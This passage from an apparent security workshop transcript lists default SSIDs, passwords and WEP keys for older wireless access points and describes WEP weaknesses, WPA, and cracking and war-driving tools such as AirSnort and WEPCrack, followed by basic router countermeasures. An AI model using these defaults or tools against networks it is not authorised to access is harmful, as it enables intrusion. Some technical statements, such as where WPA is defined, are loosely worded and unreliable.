Default IP: 192.168.0.254

Default MAC: 00:90:d1:00:11:11(00:90:d1:xx:xx:xx)

Default AP Name: MiniAP

Default Channel: 11

Default Admin Pass: MiniAP

SMC 2682W EZ-Connect Wireless Bridge

Default SSID: 'BRIDGE'

53

Default Channel: 11

Default Admin pass: WLAN_BRIDGE

Default MAC:00:90:d1:00:b8:9c (00:90:d1:xx:xx:xx)

SOHOware NetBlaster II

Default SSID: same as mac

Default MAC:00:80:c6:xx:xx:xx

Default Channel:8

Symbol AP41x1 and LA41x1 / LA41X3 802.11 DS

Default SSID: '101

Default MAC: 00:a0:0f:xx:xx:xx

Default WEP key one: 10 1112 13 14 15

Default WEP key two: 20 21 22 23 24 25

Default WEP key three: 30 31 32 33 34 35

Default WEP key four: 40 41 42 43 44 45

TELETRONICS WL-Access Point

Default SSID: 'any'

Default Password: 1234

Console Port: No password, AT command set

Wave Lan Family

54

Default SSID: 'WaveLAN Network'

Default channel: 3

ZCOMAX Access Point XWL450

Default SSID: 'any'; 'mello' ; 'Test'

Default password: 1234

Console Port: No Password, AT command set

ZYXEL Prestige 316 Gateway/Natbox/WirelessBridge

Default SSID: 'Wireless'

Default Channel: 1

Default console pass: 1234

Default telnet pass: 1234

Console Port: Same password for system, ansi/vt100 terminal

1stWave Access Points

Default SSID: '1stWave'

ELSA Lancom Wireless L-11 / AirLancer

Default SSID: 'ELSA'

55

3.2 WEP & WPA Summery

WEP

WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to

provide for confidentiality of data on wireless networks at a level equivalent to that of wired

LANs.Wired LANs typically employ physical controls to prevent unauthorized users from

connecting to the network and viewing data. In a wireless LAN, the network can be

accessed without physically connecting to the LAN. IEEE chose to employ encryption at

the data link layer to prevent unauthorized eavesdropping on a network. This is

accomplished by encrypting data with the RC4 encryption algorithm.

Deficiencies of WEP

IV is too short, even not protected from reuse.

The per packet key is constructed from IV,making it susceptible to weak key attacks.

No effective detection message.

No inbuilt provision to update key in all wireless clients connected to access point.

No protection against message replay

WPA and WPA2

WPA stands for Wifi Protected Access. It is defined in IEEE 802.1X. It is basically

a RC4 stream cipher with 128 bit and 48 bit IV. It uses TKIP temporal key integrity

protocol and Message integrity code (MIC) Micheal to ensure data integrity.

Hacking Tool: Netstumbler: http://www.netstumbler.org

56

NetStumbler displays:

1. Signal Strength

2. MAC Address

3. SSID

4. Channel details

NetStumbler is a Windows-based war-driving tool that will detect wireless networks and

mark their relative position with a GPS. NetStumbler uses an 802.11 Probe Request sent to

the broadcast destination address, causing all access points in the area to issue 802.11 Probe

Response containing network configuration information, such as their SSID and WEP status.

When hooked up to a GPS, NetStumbler will record a GPS coordinate for the highest signal

strength found for each access point. Using the network and GPS data, the user can create

maps with tools such as Microsoft MapPoint.

1. AiroPeek: http://www.wildpackets.com

Airopeek is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all

higher level network protocols such as TCP/IP, Apple Talk, NetBUI and IPX. In addition,

AiroPeek quickly isolates security problems, fully decodes 802.11a and 802.11b WLAN

protocols, and analyzes wireless network performance with accurate identification of signal

strength, channel and data rates.

2. Airsnort : http://airsnort.shmoo.com/

AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates

by passively monitoring transmissions, computing the encryption key when enough packets

have been gathered. AirSnort requires approximately 5-10 million encrypted packets to be

gathered. Once enough packets have been gathered, AirSnort can guess the encryption

password in under a second

3. Kismet

Kismet is a 802.11b wireless network sniffer which separates and identifies different

wireless networks in the area. Kismet works with any wireless card which is capable of

reporting raw packets.

57

WEPCrack

WEPCrack is an open source tool for breaking 802.11 WEP secret keys. While Airsnort has

captured the media attention, WEPCrack was the first publically available code that

demonstrated the above attack.

The current tools are Perl based and are composed of the following scripts:

WeakIVGen.pl, prism-getIV.pl, WEPCrack.pl

Countermeasures:

Dont Configured WIFI Router as Unsecured Connection, It can be misused by

someone.

Usually ISP configure your phone number/mobile number as default Network Key in

Router. one should change it as soon as possible if so.

If configured as Unsecured Connection then enable the logging system. This helps

you to get MAC (Media Access Control) address of the machines which uses your

wifi router.

If Configured as Unsecured Connection then kindly install packet capturing software

or WLAN analyzing software so that you can keep eye on machines which uses your

wifi router.

If configured as Unsecured Connection then bind your MAC address with the router.

This will only allow your authenticated laptops to get connected to router.

Protect Your SSIDS & Dont use WEP while isp configures ur router.

Dont ever use viral networks like "Free internet" Or "wifi" Network because those

networks are designed to steal your data from laptop.

Maintain All types of Logs for atleast 6 months.

TechDefence Workshop Final

Documents

Transcript of TechDefence Workshop Final